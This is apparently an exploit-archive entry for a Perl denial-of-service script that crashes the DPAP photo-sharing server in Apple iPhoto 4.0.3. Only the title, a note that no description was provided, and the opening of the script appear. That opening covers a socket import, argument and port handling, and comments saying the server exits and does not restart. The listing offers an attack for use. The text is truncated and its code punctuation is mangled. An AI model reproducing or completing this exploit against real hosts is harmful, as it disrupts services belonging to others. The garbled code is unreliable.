"Apple iPhoto 4.0.3 DPAP Server Denial of Service Exploit"
No description provided by source. !/usr/bin/perl crash the iPhoto DPAP Digital Photo Access Protocol Server on iPhoto 4.0.3 technically the server exits cleanly but it does not restart use IO::Socket::INET; die "Usage $0 targetip\n" unless $ARGV0; $| = 1; if $ARGV1 $port = $ARGV1; else $port =...